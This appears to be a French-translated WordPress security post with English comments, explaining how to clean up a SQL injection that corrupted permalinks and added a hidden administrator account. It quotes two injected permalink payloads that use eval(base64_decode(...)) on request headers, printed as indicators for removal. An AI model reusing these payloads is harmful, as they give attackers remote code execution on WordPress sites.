De nombreux sites sont touchés par une récente attaque SQL où des codes sont injectés dans votre site. Cette injection MySQL affecte vos permaliens en les rendant inefficaces. Par conséquent, les URLs de vos publications de blog ne fonctionneront pas. De nombreux blogs WordPress ont été visés par cette attaque. Merci à Andy Soward d’avoir attiré notre attention sur ce problème.
L’un des codes suivants a été ajouté à votre structure permalienne suite à cette attaque :
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Ces guillemets ont ajouté tous les permaliens de votre site et ils peuvent être modifiés uniquement s’ils sont retirés manuellement.
Pour corriger ce problème, rendez-vous à l’adresse suivante :
Réglages > Permaliens et supprimez le code ci-dessus et remplacez le code par défaut.
La prochaine chose à faire est d’aller dans Utilisatrices/utilisateurs. Vous verrez qu’il y a plus d’une administratrice/administratrice. Vous ne verrez pas leur nom listé, mais vous verrez le compte augmenté. La dernière chose à faire est de regarder tous les utilisateurs/utilisatrices et de trouver la dernière personne qui s’est inscrite. Placez votre souris sur cet utilisateur/utilisatrice et obtenez le lien. Modifiez le code userid= en ajoutant 1 à ce nombre. Ainsi, si le dernier utilisateur/utilisatrice que vous pouvez voir était l’utilisateur/utilisatrice n°2, ajoutez 1 à ce chiffre et vous obtiendrez 3. Vous devriez trouver que l’administrateur masqué a un code bizarre comme prénom. Supprimez le code et faites-en un abonné/abonné. Ensuite, revenez et supprimez-le.
Cela devrait corriger le problème. Vous pouvez également le supprimer en allant simplement dans votre PHPMyAdmin. Vous y verrez l’utilisateur/utilisatrice.
Nous voulions simplement diffuser cette nouvelle dès que possible, afin que nos utilisateurs/utilisatrices puissent être mis au courant. Veuillez vous assurer que votre blog n’est pas infecté. Nous espérons que WordPress publiera une version bientôt disponible.
Si vous ne l’avez pas encore fait, mettez en œuvre certaines de ces mesures pour sécuriser votre zone d’administration WordPress.
ahmed_alaaedin
The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!
a wordpress user
i was hit by this twice.
first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.
once they restore my a/c i will remove wordpres.. I have had it!
Editorial Staff
Perhaps its not WordPress fault, maybe your hosting security is just not as good…
Administrateur
Joey
What did you figure out with this? I was just hit with same issue. All my WP sites on my account are suffering the same problem.
lerrkin
Hi.
Interesting url https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ linked from here shows blank page.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Editorial Staff
We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.
Administrateur
lerrkin
Maybe that was WP External Link and Super Cache conflict…
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible Text was « Page not cached by WP Super Cache. No closing HTML tag. Check your theme ».
So last Super Cache ver. promises to do not html validity check.
Oh, I’m reading!
Thanks a lot!
Roseli A. Bakar
Thanks for highlighting this